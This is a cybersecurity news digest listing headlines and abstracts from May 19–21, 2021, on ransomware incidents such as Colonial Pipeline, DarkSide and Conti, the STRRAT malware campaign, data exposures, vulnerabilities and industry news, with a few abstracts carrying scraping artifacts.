Abstract Microsoft on Thursday warned of a "massive email campaign" that's pushing a Java-based STRRAT malware to steal confidential data from infected systems while disguising itself as a ransomware infection. "This RAT is infamous for its ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them," the Microsoft Security Intelligence team  said  in a series of tweets. The new wave of attacks, which the company spotted last week, commences with spam emails sent from compromised email accounts with "Outgoing Payments" in the subject line, luring the recipients into opening malicious PDF documents that claim to be remittances, but in reality, connect to a rogue domain to download the STRRAT malware. Besides establishing connections to a command-and-control server during execution, the malware comes with a range of features that allow it to collect browser passwords, log keystrokes, and run remote command

The Hacker News

May 21, 2021 – General

Report Shows Global CISOs Failing to Practice What They Preach Full Text

Abstract Report reveals widespread risky behavior from IT security leaders

Infosecurity Magazine

May 21, 2021 – Criminals

Bitcoins of DarkSide ransomware gang still locked in hacker forum’s escrow Full Text

Abstract After DarkSide ransomware gang shut down operations, multiple affiliates have complained about not receiving the payments for successful breaches. The decision of the DarkSide ransomware gang to shut down operations is causing chaos among its network...

Security Affairs

May 21, 2021 – Criminals

DarkSide affiliates claim gang’s bitcoins in deposit on hacker forum Full Text

Abstract Since the DarkSide ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.

BleepingComputer

May 21, 2021 – Attack

CNA Financial Paid $40 Million in Ransom After March Cyberattack Full Text

Abstract CNA Financial, one of the largest U.S. insurance companies, paid $40 million in late March to regain control of its network after a ransomware attack, according to people familiar with the matter.

Bloomberg

May 21, 2021 – General

Global Credential Stuffing Attempts Hit 193 Billion in 2020 Full Text

Abstract Akamai claims web app attacks also surged to 6.3 billion

Infosecurity Magazine

May 21, 2021 – Solution

Microsoft SimuLand, an open-source lab environment to simulate attack scenarios Full Text

Abstract Microsoft released SimuLand, an open-source tool that can be used to build lab environments to simulate attacks and verify their detection. Microsoft has released SimuLand, an open-source lab environment that allows to reproduce the techniques used...

Security Affairs

May 21, 2021 – Malware

Microsoft Warns of Massive STRRAT Malware Campaign Delivering Fake Ransomware Full Text

Abstract The Java-based STRRAT was distributed in a massive spam campaign, the malware shows ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them.

Security Affairs

May 21, 2021 – Breach

Cloud Misconfiguration Exposes 100M+ Android Users Full Text

Abstract Check Point reveals series of mistakes by developers

Infosecurity Magazine

May 21, 2021 – Outage

Alaska Health Department Website Faces Outage Following Malware Attack Full Text

Abstract The Alaska department's website was taken offline Monday evening and will be unavailable to the public until further details are known about the security incident, department officials say.

Gov Info Security

May 21, 2021 – Business

Apple isn’t happy about the amount of Mac malware out there Full Text

Abstract A top Apple exec has said that Mac malware has now exceeded Apple's level of tolerance, and framed security as the reason for keeping iPhones locked to the App Store, during testimony is a lawsuit.

ZDNet

May 21, 2021 – Business

API security startup 42Crunch raises $17M Series A led by Energy Impact Partners Full Text

Abstract 42Crunch, an API security startup, has raised $17 million in its Series A funding round led by Energy Impact Partners. Adara Ventures also participated in this funding round.

TechCrunch

May 21, 2021 – General

3.4 billion credential stuffing attacks hit financial services organizations Full Text

Abstract In 2020, there were 193 billion credential stuffing attacks globally, with 3.4 billion hitting financial services organizations specifically – an increase of more than 45% YOY in the sector.

Help Net Security

May 21, 2021 – Attack

#RSAC: The Most Dangerous New Attack Techniques Full Text

Abstract Annual panel at the RSA Conference identifies a number of areas of concern, including improper session handling and an evolution of ransomware

Infosecurity Magazine

May 20, 2021 – Breach

Misconfigurations may have exposed data on 100 million Android users Full Text

Abstract CheckPoint Research explained how the misuse of a real-time database, notification managers, and storage exposed the personal data of users, leaving corporate resources vulnerable to bad threat actors.

SCMagazine

May 20, 2021 – Policy and Law

Irish High Court issues injunction to prevent HSE data leak Full Text

Abstract The High Court of Ireland has issued an injunction against the Conti Ransomware gang, demanding that stolen HSE data be returned and not sold or published.

BleepingComputer

May 20, 2021 – Government

Top Arizona elections official says voting machines turned over to GOP recount should be replaced Full Text

Abstract Arizona Secretary of State Katie Hobbs (D) on Thursday advised Maricopa County officials to replace all voting machines that were turned over to the private contractor carrying out an audit of the 2020 presidential election.

The Hill

May 20, 2021 – General

#RSAC: The Rise of the Chief Product Security Officer Full Text

Abstract Experts at the RSA Conference outline the role, challenges and opportunities for the emerging job category of the chief product security officer (CPSO)

Infosecurity Magazine

May 20, 2021 – General

#RSAC: Cyber-threat Landscape “the Worst It’s Ever Been” Due to Nation-State Behaviors Full Text

Abstract Iran, Russia, North Korea and China are becoming increasingly reckless in their actions

Infosecurity Magazine

May 20, 2021 – Solution

Comcast now blocks BGP hijacking attacks and route leaks with RPKI Full Text

Abstract Comcast, one of America's largest broadband providers, has now deployed RPKI on its network to defend against BGP route hijacks and leaks. Left unchecked, a BGP route hijack or leak can cause a drastic surge in internet traffic that now gets misdirected or stuck, leading to global congestion and a Denial of Service (DoS).

BleepingComputer

May 20, 2021 – Malware

AHK Rat Loader Delivers Multiple RATs Full Text

Abstract A malware campaign that has been undergoing constant development in its toolsets since February now boasts of four different malware versions - all of which start with an AHK executable that leads to the different VBScripts.

Cyware Alerts - Hacker News

May 20, 2021 – General

Hillicon Valley: Amazon facing lawsuits alleging racial, gender bias | Senate Commerce panel advances Biden’s top science nominee | Colonial Pipeline CEO to testify on Capitol Hill in June Full Text

Abstract Amazon this week found itself in more hot water, as multiple women at the company accused the company of racial and gender bias discrimination in lawsuits filed Wednesday. Meanwhile on Capitol Hill, the Senate Commerce Committee approved President BidenJoe BidenIsrael-Hamas ceasefire could come as soon as Friday: report US opposes UN resolution calling on Israel-Gaza ceasefire Parents of 54 migrant children found after separation under Trump administration MORE’s nominee to lead the Office of Science and Technology Policy, and the House Homeland Security Committee announced that Colonial Pipeline CEO Joseph Blount will testify on the recent ransomware attack next month. 

The Hill

May 20, 2021 – General

#RSAC: What Makes a Security Program Measurably More Successful? Full Text

Abstract Wendy Nather and Wade Baker have a few data-driven ideas about which activities actually help to make security programs work and which ones have less impact

Infosecurity Magazine

May 20, 2021 – Malware

STRRAT RAT spreads masquerading as ransomware Full Text

Abstract Microsoft warns of a malware campaign that is spreading a RAT dubbed named STRRAT masquerading as ransomware. Microsoft Security Intelligence researchers uncovered a malware campaign that is spreading a remote access trojan (RAT) tracked as STRRAT....

Security Affairs

May 20, 2021 – Hacker

What makes North Korean hacking groups more creative? Full Text

Abstract From use of custom malware to pioneering strategies, North Korean hacking groups have shown an innovative spirit that helps them to punch above their weight.

SCMagazine

May 20, 2021 – Vulnerabilities

Four Android Bugs Being Exploited in the Wild Full Text

Abstract On Wednesday, Google quietly slipped updates into its May 3 Android security bulletin for bugs that its Project Zero group has confirmed are zero-days.

Threatpost

May 20, 2021 – Solution

Microsoft releases SimuLand, a test lab for simulated cyberattacks Full Text

Abstract Microsoft has released SimuLand, an open-source lab environment to help test and improve Microsoft 365 Defender, Azure Defender, and Azure Sentinel defenses against real attack scenarios.

BleepingComputer

May 20, 2021 – Phishing

Fraudsters Employ Amazon Voice Phishing Attacks in Fake Order Scams Full Text

Abstract In case studies published by Armorblox, it highlighted two Amazon vishing attacks intent on stealing customer credit card details -- and how the use of voice messages can bypass existing spam filters.

ZDNet

May 20, 2021 – Business

Colonial Pipeline CEO to testify on Capitol Hill in June following cyberattack Full Text

Abstract Colonial Pipeline CEO Joseph Blount will testify in June before the House Homeland Security Committee at a hearing one month after the company was forced to shut down operations due to a devastating ransomware attack. 

The Hill

May 20, 2021 – Privacy

USPS Reportedly Uses Clearview AI to Spy on Americans Full Text

Abstract US Postal Service reportedly uses facial recognition tech to identify unknown targets in investigations

Infosecurity Magazine

May 20, 2021 – General

2021 Attacker Dwell Time Trends and Best Defenses Full Text

Abstract The time that attackers stay hidden inside an organization’s networks is shifting, putting pressure on defenders and upping the need to detect and respond to threats in real-time.

Threatpost

May 20, 2021 – Disinformation

Spammers flood PyPI with pirated movie links and bogus packages Full Text

Abstract The official Python software package repository, PyPI, is getting flooded with spam packages, as seen by BleepingComputer. These packages are named after different movies in a style that is commonly associated with torrents and "warez" sites hosting pirated content.

BleepingComputer

May 20, 2021 – Education

GlobalPlatform expands TEE certification scheme Full Text

Abstract GlobalPlatform has expanded its Trusted Execution Environment (TEE) security certification scheme to enable evaluation of discrete technologies that come together to make up a complete TEE solution.

Help Net Security

May 20, 2021 – Ransomware

US insurer paid $40 million ransom after March cyber attack: report Full Text

Abstract One of the largest insurance companies in the U.S. reportedly paid $40 million in ransom in March to regain control of its network following a ransomware attack.

The Hill

May 20, 2021 – General

Cyber-bully Supermodel Dropped by 3 Stores Full Text

Abstract Chrissy Teigen’s apology for previous cyber-bullying not enough to stop retailers from ditching her products

Infosecurity Magazine

May 20, 2021 – Malware

Apple Exec Calls Level of Mac Malware ‘Unacceptable’ Full Text

Abstract Company is using threat of attacks as defense in case brought against it by Epic Games after Fortnite was booted from the App Store for trying to circumvent developer fees.

Threatpost

May 20, 2021 – General

Blind SQL Injection flaw in WP Statistics Plugin Impacted by Over 600,000 WordPress Sites Full Text

Abstract Researchers from the Wordfence Threat Intelligence discovered a Time-Based Blind SQL Injection vulnerability in WP Statistics, which is a WordPress plugin with over 600,000 active installs.

Security Affairs

May 20, 2021 – Policy and Law

Nigeria Suspends Official Charged with Defrauding US Full Text

Abstract Governor’s aide suspended following arrest over unemployment benefits fraud

Infosecurity Magazine

May 20, 2021 – Ransomware

Colonial Pipeline confirms it paid $4.4m ransom to hacker gang after attack Full Text

Abstract Joseph Blount, Colonial Pipeline’s CEO, told the Wall Street Journal he authorized the payment because the firm didn’t know the extent of the damage and wasn’t sure how long it would take to recover.

The Guardian

May 20, 2021 – Solution

Google Chrome Makes It Easier to Update Compromised Passwords Full Text

Abstract Google is launching a new capability in Chrome to alert users when a password is compromised and automate the process of updating to a new one. The feature runs on Google's Duplex technology.

Dark Reading

May 20, 2021 – Vulnerabilities

Information disclosure vulnerability spotted in macOS SMB server Full Text

Abstract The integer overflow vulnerability exists in the way macOS SMB server processes SMB3 compounded packets. An attacker could exploit this vulnerability by sending a specially crafted packet.

Cisco Talos

May 20, 2021 – Ransomware

Conti ransomware gives HSE Ireland free decryptor, still selling data Full Text

Abstract The Conti ransomware gang has released a free decryptor for Ireland's health service, the HSE, but warns that they will still sell or release the stolen data.

BleepingComputer

May 20, 2021 – Ransomware

Money-go-round: The booming cottage industry behind ransomware Full Text

Abstract As policymakers try to respond to incidents, they're finding out that the problem is larger than cybercriminals extorting corporations and governments to regain access to their own data.

Politico

May 20, 2021 – Breach

23 Android Apps Expose Over 100,000,000 Users’ Personal Data Full Text

Abstract Misconfigurations in multiple Android apps leaked sensitive data of more than 100 million users, potentially making them a lucrative target for malicious actors. "By not following best-practices when configuring and integrating third-party cloud-services into applications, millions of users' private data was exposed," Check Point researchers said in an analysis published today and shared with The Hacker News. "In some cases, this type of misuse only affects the users, however, the developers were also left vulnerable. The misconfigurations put users' personal data and developer's internal resources, such as access to update mechanisms, storage, and more at risk." The findings come from a study of 23 Android applications available in the official Google Play Store, some of which have downloads ranging from 10,000 to 10 million, such as Astro Guru , iFax, Logo Maker , Screen Recorder , and T'Leva . According to Check Point, the issues stem from m

The Hacker News

May 20, 2021 – General

HMRC Investing Heavily in Cybersecurity Training for Staff, Official Figures Show Full Text

Abstract The Art of Hacking was the most popular course for HMRC security staff

Infosecurity Magazine

May 20, 2021 – Ransomware

It’s Time to Surge Resources Into Prosecuting Ransomware Gangs Full Text

Abstract The Justice Department needs a “troop surge” of cyber prosecutors and agents to conduct long-term, proactive investigations into ransomware gangs and the organizations that enable them.

Lawfare

May 20, 2021 – Breach

A dozen Android apps exposed data of 100M+ users Full Text

Abstract Check Point researchers found 23 Android apps that exposed the personal data of more than 100 million users. Security researchers from Check Point have discovered 23 Android applications that exposed the personal data of more than 100 million users...

Security Affairs

May 20, 2021 – Breach

Data of 100+ million Android users exposed via misconfigured cloud services Full Text

Abstract A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

BleepingComputer

May 20, 2021 – Breach

UK recruitment firm exposed sensitive applicants data for months Full Text

Abstract This data breach majorly affected the applicants whose CVs containing personal information were leaked due to misconfigured AWS S3 buckets, reports the research team at Website Planet.

Hackread

May 20, 2021 – General

Is Single Sign-On Enough to Secure Your SaaS Applications? Full Text

Abstract If there's one thing all great SaaS platforms share in common, it's their focus on simplifying the lives of their end-users. Removing friction for users in a safe way is the mission of single sign-on (SSO) providers. With SSO at the helm, users don't have to remember separate passwords for each app or hide the digital copies of the credentials in plain sight. SSO also frees up the IT's bandwidth from handling recurring password reset requests while improving productivity for everyone in your organization. However, there is also a level of risk that comes with SSO capability.  How to protect against SSO fails Real-Life Risks Involved in SSO  While SSO facilitates ease of access to a great extent, it also comes with some amount of imminent risk. SSO is a good enabler of efficiency, but not the end-all security solution with its own flaws that allow for bypass. There's a specific class of vulnerability that Adam Roberts from the NCC Group detected in several SSO

The Hacker News

May 20, 2021 – General

Web App Bugs Drove Multiple Breaches Per Firm in 2020 Full Text

Abstract Barracuda Networks claims bad bots are the main challenge

Infosecurity Magazine

May 20, 2021 – Policy and Law

Privacy Concerns On Cookies Storing Personal Information Full Text

Abstract Which are privacy concerns on the way organizations collect personal information through the use of cookies? Data is constantly being tracked, stored and processed right under our noses, and it is quite frightening to know just how much data a company...

Security Affairs

May 20, 2021 – Ransomware

This is how long hackers will hide in your network before deploying ransomware or being spotted Full Text

Abstract Cyberattackers on average have 11 days after breaching a target network before they're being detected, according to Sophos – and often when they are spotted it's because they've deployed ransomware.

ZDNet

May 20, 2021 – Attack

Watering Hole Attack Was Used to Target Florida Water Utilities Full Text

Abstract An investigation undertaken in the aftermath of the  Oldsmar water plant hack  earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack. "This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event," Dragos researcher Kent Backman  said  in a write-up published on Tuesday. The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said. Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system an

The Hacker News

May 20, 2021 – Malware

Fake Microsoft Authenticator extension discovered in Chrome Store Full Text

Abstract According to the report, the fake Microsoft Authenticator extension was made available on April 23 this year after failing to be spotted by Google’s security systems and has reached 448 users.

Bitdefender

May 20, 2021 – Phishing

Domain Group Discloses Phishing Attack that Targete Site Users Full Text

Abstract "We have identified a scam that used a phishing attack to gain access to Domain's administrative systems to engage with people who have made rental property enquiries," the company's CEO told ZDNet.

ZDNet

May 20, 2021 – Malware

BazarCall: Call Centers Help Spread BazarLoader Malware Full Text

Abstract In February, researchers began reporting a call center-based method of distributing BazarLoader. It utilizes trial subscription-themed emails that encourages potential victims to call a phone number.

Palo Alto Networks

May 20, 2021 – Hacker

Exchange Server Attackers Launched Scans Within Five Minutes of Disclosure Full Text

Abstract Cheap cloud services support threat actor efforts

Infosecurity Magazine

May 20, 2021 – Vulnerabilities

Pega Infinity patches authentication vulnerability - Malwarebytes Labs Full Text

Abstract There are several PoCs readily available, including complete videos on YouTube, so users of the Pega Infinity enterprise software platform are being advised to update their installations.

Malwarebytes Labs

May 20, 2021 – Government

European Union Extends Framework for Cyberattack Sanctions Full Text

Abstract This week, the European Council announced its decision to extend for one year the framework for sanctions against cyberattacks that threaten the European Union and its member states.

Security Week

May 20, 2021 – Ransomware

Colonial CEO Reportedly Confirms $4.4 Million Ransom Payment Full Text

Abstract Firm speaks out about attack

Infosecurity Magazine

May 20, 2021 – Policy and Law

Russian citizen Anton Bogdanov sentenced to 5 years for cyber tax fraud scheme Full Text

Abstract Russian hacker Anton Bogdanov was sentenced to 5 years' imprisonment for attempting to steal $1.5 million in tax refunds by hacking into tax preparation firms. The Russian citizen Anton Bogdanov (35), aka Kusok, was sentenced by a US Chief District...

Security Affairs

May 20, 2021 – Phishing

Royal Mail phish deploys evasion tricks to avoid analysis Full Text

Abstract When you click the link to visit the fake Royal Mail page, there’s a fair bit of code for detecting potential VM use. It tests for WebGL renders and whether site visitors have a display or not.

Malwarebytes Labs

May 20, 2021 – Vulnerabilities

Blind SQL Injection flaw in WP Statistics impacted 600K+ sites Full Text

Abstract Experts discovered a Time-Based Blind SQL Injection vulnerability in the WP Statistics plugin which is installed on over 600,000 WordPress sites. Researchers from the Wordfence Threat Intelligence discovered a Time-Based Blind SQL Injection vulnerability...

Security Affairs

May 20, 2021 – Cryptocurrency

#RSAC: The Security Risks of Cryptocurrency Full Text

Abstract While it's not likely that cryptocurrency will replace the US dollar as a reserve currency in the short term, RSA Conference session details cryptocurrency security risks and mitigations

Infosecurity Magazine

May 20, 2021 – Privacy

#RSAC: The Lasting Impact of the COVID Pandemic on Privacy Full Text

Abstract A year of lockdown, remote work and remote learning could well be the spark that helps to define a new era of user privacy, according to a panel of experts at the RSA Conference

Infosecurity Magazine

May 19, 2021 – Government

US denies disrupting Russian cyber group behind Colonial pipeline hack Full Text

Abstract The United States did not take action against the cyber criminal group that was behind the ransomware attack on Colonial Pipeline earlier this month, officials told The Washington Post.

The Hill

May 19, 2021 – Government

House Science panel requests briefing with Energy Dept. over Colonial hack Full Text

Abstract Leaders of the House Science, Space and Technology Committee are requesting a briefing with the Department of Energy on the ransomware attack that forced the Colonial Pipeline to shut down operations for nearly a week.

The Hill

May 19, 2021 – Business

As digital innovation accelerates, what is the next cyber investment unicorn? Full Text

Abstract Companies poised to do well in the rapidly accelerated digital economy are those that can cater to concepts such as dynamic network infrastructure and securing edge computing. In particular, said Chenxi Wang of Rain Capital, the market is witnessing “great momentum in cloud security.”

SCMagazine

May 19, 2021 – General

Hillicon Valley: Colonial Pipeline CEO says company paid hackers $4.4 million in ransomware attack | Facebook sets up ‘special operations center’ for content on Israeli-Palestinian conflict | Granholm expresses openness to pipeline cyber standards after Full Text

Abstract The CEO of Colonial Pipeline on Wednesday gave his first interview since the company was hit by a ransomware attack earlier this month, confirming publicly that he approved the payment of $4.4 million to the hackers to regain access to IT systems. Meanwhile, Facebook has set up a special operations center to monitor content on its platforms involving the Israeli-Palestinian conflict, and Energy Secretary Jennifer GranholmJennifer GranholmOVERNIGHT ENERGY: IEA calls for no new investment in fossil fuels in net-zero plan | Biden frames EV goals as competition with China | US considering carbon import tax, Kerry says Biden administration to develop performance standards for federal buildings OVERNIGHT ENERGY: Gas shortages likely to linger for days | Biden administration issues second shipping waiver amid fuel shortages | EPA orders St. Croix refinery to shut down for 60 days due to 'imminent threat' to islanders' health MORE expressed some tentative support for mandatory security standards for pipelines. 

The Hill

May 19, 2021 – Government

DHS announces program to mitigate vulnerabilities below the operating system Full Text

Abstract A notable rise in firmware vulnerabilities comes at a time when more run-of-the-mill criminals have access. CISA proposed a multi-step approach to tackle the growing threat.

SCMagazine

May 19, 2021 – General

Ready to move to the cloud? Here’s what you need to do when vetting service providers Full Text

Abstract During the RSA Conference’s Cloud Security Summit this week, three speakers noted top priorities when making a cloud transition, all tied to establishing expectations of a cloud service provider up front, and ensuring in writing that the provider can and will adhere to specific standards for maintaining and securing data.

SCMagazine

May 19, 2021 – Botnet

Keksec Cybergang Debuts Simps Botnet for Gaming DDoS Full Text

Abstract The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.

Threatpost

May 19, 2021 – IOT

Can Nanotech Secure IoT Devices From the Inside-Out? Full Text

Abstract Work’s being done with uber-lightweight nanoagents on every IoT device to stop malicious behavior, such as a scourge of botnet attacks, among other threats.

Threatpost

May 19, 2021 – Phishing

Microsoft, Google Clouds Hijacked for Gobs of Phishing Full Text

Abstract Attackers sent 52M malicious messages leveraging the likes of Office 365, Azure, OneDrive, SharePoint, G-Suite and Firebase storage in Q1 2021.

Threatpost

May 19, 2021 – Malware

Bizarro Trojan: Fiercely Stealing Banking Information Full Text

Abstract A new banking trojan, that can harvest bank account logins from Android mobile users, is now spreading quickly in multiple regions. B anking customers are recommended to stay vigilant.

Cyware Alerts - Hacker News

May 19, 2021 – Vulnerabilities

Google addresses 4 zero-day flaws in Android exploited in the wild Full Text

Abstract Google released Android Security Bulletin for May 2021 security updates that address four zero-day vulnerabilities that were exploited in the wild. Android Security Bulletin for May 2021 security updates address four zero-day vulnerabilities, tracked...

Security Affairs

May 19, 2021 – Covid-19

Impact of COVID-19 on Data Breach Landscape Full Text

Abstract The DBIR report from Verizon provides insights on the growing danger of phishing and ransomware attacks while digging into unique insights on the impact of the COVID-19 pandemic on the data breach landscape.

Cyware Alerts - Hacker News

May 19, 2021 – Attack

#RSAC: SolarWinds CEO Provides New Details into Attack and Response Full Text

Abstract Sudhakar Ramakrishna gives details of investigations into the supply chain attack

Infosecurity Magazine

May 19, 2021 – Business

ReaQta Closes Series-A Round to Expand Commercial Operations Full Text

Abstract ReaQta will invest the Series A funding, led by Alpha Intelligence Capital, towards expanding its commercial operations and footprint, particularly across Europe and Asia.

Yahoo! Finance

May 19, 2021 – Vulnerabilities

Threats Hover Over Tor Users Full Text

Abstract Two fresh waves of attacks including SSL-stripping attacks and scheme flooding have been observed crippling Tor users. Users are recommended to keep the web browser updated to fix any exploitable vulnerability.

Cyware Alerts - Hacker News

May 19, 2021 – Ransomware

Qlocker ransomware shuts down after extorting hundreds of QNAP users Full Text

Abstract The Qlocker ransomware gang has shut down their operation after earning $350,000 in a month by exploiting vulnerabilities in QNAP NAS devices.

BleepingComputer

May 19, 2021 – Outage

Packaging vendor Ardagh admits cyber-attack disrupted operations Full Text

Abstract In a statement issued on May 17, the manufacturer said that the assault prompted it to institute “containment procedures, including pro-actively shutting down certain IT systems and applications”.

The Daily Swig

May 19, 2021 – Government

Granholm expresses openness to pipeline cyber standards after Colonial attack Full Text

Abstract Energy Secretary Jennifer Granholm on Wednesday threw her tentative support behind the idea of mandatory standards to secure pipelines in the wake of the debilitating ransomware attack on Colonial Pipeline earlier this month.

The Hill

May 19, 2021 – Breach

UHS Data Breach Lawsuit Proceeds Full Text

Abstract Data breach lawsuit against healthcare provider gets the go-ahead but only for one patient

Infosecurity Magazine

May 19, 2021 – Attack

Trailer maker Utility targeted in ransomware attack Full Text

Abstract Utility Trailer Manufacturing, one of the largest U.S. producers of trailers for the trucking industry, was targeted in a ransomware attack that exposed personal information of numerous employees.

Freight Waves

May 19, 2021 – Business

Splunk to Acquire TruSTAR Full Text

Abstract California tech company Splunk announces plan to snap up cloud-native security firm

Infosecurity Magazine

May 19, 2021 – Ransomware

How the ransomware explosion is reshaping the cyber insurance market Full Text

Abstract After the NotPetya attacks, insurance companies started applying far more scrutiny to efforts by customers to protect themselves from ransomware. In the wake of Colonial Pipeline and other recent incidents, more shifts in coverage could emerge – and priorities of the insurers might not match up with those of victims.

SCMagazine

May 19, 2021 – Business

Cynerio Raises $30M in Series B Funding Full Text

Abstract It was led by Alive Israel HealthTech Fund, with participation from existing investors Accelmed, RDC, MTIP, CBG London investment company owned by Vincent Tchenguiz, and UAE based investment group.

FinSMEs

May 19, 2021 – Vulnerabilities

May Android security updates patch 4 zero-days exploited in the wild Full Text

Abstract According to info provided by Google's Project Zero team, four Android security vulnerabilities were exploited in the wild as zero-day bugs before being patched earlier this month.

BleepingComputer

May 19, 2021 – Criminals

DarkSide Gang Retires on $90m Full Text

Abstract Wallet containing Bitcoin worth over $90m is reportedly ransomware gang’s ill-gotten gains

Infosecurity Magazine

May 19, 2021 – General

#DTX: Security Pros Must Focus on Human Behaviors to Address Cyber-challenges Full Text

Abstract There's more the industry can do to prevent social engineering attacks and scams

Infosecurity Magazine

May 19, 2021 – Business

Colonial Pipeline CEO says company paid hackers $4.4 million in ransomware attack Full Text

Abstract The CEO of Colonial Pipeline, hit by a ransomware attack that forced it to shut down operations for much of last week, confirmed publicly for the first time Wednesday that the company paid the hackers behind the attack so it could regain access to its systems.

The Hill

May 19, 2021 – Vulnerabilities

Researchers Find Exploitable Remote Code Execution Vulnerabilities in Mercedes-Benz Cars Full Text

Abstract Following an eight-month audit of the code in the latest infotainment system in Mercedes-Benz cars, security researchers with Tencent Security Keen Lab identified five vulnerabilities.

Security Week

May 19, 2021 – Malware

TeamTNT’s Extended Credential Harvester Targets Cloud Services, Other Software Full Text

Abstract The cybercriminal group TeamTNT is no stranger to targeting cloud containers, expanding their arsenal to steal cloud credentials, and exploring other environments and intrusive activities.

Trend Micro

May 19, 2021 – Policy and Law

US introduces bills to secure critical infrastructure from cyber attacks Full Text

Abstract The US House Committee on Homeland Security has passed five bipartisan bills on Monday to bolster defense capabilities against cyber attacks targeting US organizations and critical infrastructure.

BleepingComputer

May 19, 2021 – General

Google Cloud CISO: Usability must be baked into design of security tools Full Text

Abstract Security and usability are not mutually exclusive, and effectively combining these concepts can help organizations overcome the cyber skills gap, according to Google Cloud Chief Information Security Officer Phil Venables, during an RSA Conference keynote session.

SCMagazine

May 19, 2021 – Hacker

Hackers scan for vulnerable devices minutes after bug disclosure Full Text

Abstract Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

BleepingComputer

May 19, 2021 – Vulnerabilities

Emerson Patches Several Vulnerabilities in X-STREAM Gas Analyzers Full Text

Abstract American industrial giant Emerson this week informed customers that it has released firmware updates for its Rosemount X-STREAM gas analyzers to address half a dozen vulnerabilities.

Security Week

May 19, 2021 – Ransomware

School districts struggle to defend against rising ransomware attacks Full Text

Abstract Cyber criminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down the Colonial Pipeline earlier this month.

The Hill

May 19, 2021 – Ransomware

DarkSide Ransomware Gang Extorted $90 Million from Several Victims in 9 Months Full Text

Abstract DarkSide, the hacker group behind the  Colonial Pipeline ransomware attack  earlier this month, received $90 million in bitcoin payments following a nine-month ransomware spree, making it one of the most profitable cybercrime groups. "In total, just over $90 million in bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets," blockchain analytics firm Elliptic  said . "According to  DarkTracer , 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million." Of the total $90 million haul, the DarkSide's developer is said to have received $15.5 million in bitcoins, while the remaining $74.7 million was split among its various affiliates. FireEye's research into DarkSide's affiliate program had  previously revealed  that its creators take a 25% cut for payments under $500,000 and 10% for ransoms above $5 million, with t

The Hacker News

May 19, 2021 – Policy and Law

Regulator Fines QR Code Provider Which Spammed Customers Full Text

Abstract St Albans company sent 84,000 nuisance emails

Infosecurity Magazine

May 19, 2021 – Vulnerabilities

Hacking the infotainment system used in Mercedes-Benz cars Full Text

Abstract Security researchers identified five vulnerabilities in the infotainment system in Mercedes-Benz cars, four of them are remotely exploitable. Security researchers with Tencent Security Keen Lab identified five vulnerabilities, tracked as CVE-2021-23906,...

Security Affairs

May 19, 2021 – Vulnerabilities

Windows PoC Exploit Released for Wormable RCE Full Text

Abstract The exploit pries open CVE-2021-31166, a bug with a CVSS score of 9.8 that was the baddest of the bad in Microsoft’s Patch Tuesday release last week.

Threatpost

May 19, 2021 – Vulnerabilities

Latest phones are great at thwarting Wi-Fi tracking. Other devices, not so much – study Full Text

Abstract While the paper indicates that mobile phones have become better at implementing MAC address randomization, it also highlights the lack of a standard approach has led to inconsistent implementations.

The Register

May 19, 2021 – Solution

Mozilla Begins Rolling Out ‘Site Isolation’ Security Feature to Firefox Browser Full Text

Abstract Mozilla has begun rolling out a new security feature for its Firefox browser in nightly and beta channels that aims to protect users against a new class of side-channel attacks from malicious sites. Called "Site Isolation," the implementation loads each website separately in its own operating system process and, as a result, prevents untrusted code from a rogue website from accessing confidential information stored in other sites. "This fundamental redesign of Firefox's Security architecture extends current security mechanisms by creating operating system process-level boundaries for all sites loaded in Firefox for Desktop," Mozilla  said  in a statement. "Isolating each site into a separate operating system process makes it even harder for malicious sites to read another site's secret or private data." The motivation for Site Isolation can be traced all the way back to January 2018 when  Spectre and Meltdown vulnerabilities  were publicly dis

The Hacker News

May 19, 2021 – General

RDP Hijacked for Lateral Movement in 69% of Attacks Full Text

Abstract Sophos report warns that dwell time is up to 11 days

Infosecurity Magazine

May 19, 2021 – Ransomware

Conti ransomware gang also breached Ireland Department of Health (DoH) Full Text

Abstract Conti ransomware also breached the network of Ireland's Department of Health (DoH) but the ransomware failed to encrypt the systems. Last week, Conti ransomware gang targeted the Ireland’s Health Service Executive that was forced to shut down its IT systems...

Security Affairs

May 19, 2021 – Malware

New WastedLoader Campaign Delivered Through RIG Exploit Kit Full Text

Abstract In February 2021, Bitdefender researchers identified a new RIG Exploit Kit campaign exploiting two scripting engine vulnerabilities in unpatched Internet Explorer browsers.

Bitdefender

May 19, 2021 – Solution

A Simple 1-Click Compromised Password Reset Feature Coming to Chrome Browser Full Text

Abstract Google on Tuesday  announced  a new feature to its password manager that could be used to change a stolen password automatically with a single tap. Automated password changes build on the tool's ability to  check the safety  of saved passwords. Thus when Chrome finds a password that may have been compromised as part of a data breach, it will prompt users with an alert containing a "Change Password" button, tapping which "Chrome will not only navigate to the site, but also go through the entire process of changing your password." Enabling this in the background is Google's  Duplex  technology, which it debuted in 2018 and expanded in 2019 to support various functions in Google Assistant like booking a rental car, ordering food, and buying movie tickets. The search giant, however, noted that users could take over control at any point during the process and change the password manually. The feature is currently being rolled out in Chrome for Android to al

The Hacker News

May 19, 2021 – Breach

Recruiter’s Cloud Snafu Exposes 20,000 CVs and ID Documents Full Text

Abstract Misconfigured AWS bucket again to blame

Infosecurity Magazine

May 19, 2021 – Business

Styra, the startup behind Open Policy Agent, nabs $40M to expand its cloud-native authorization tools Full Text

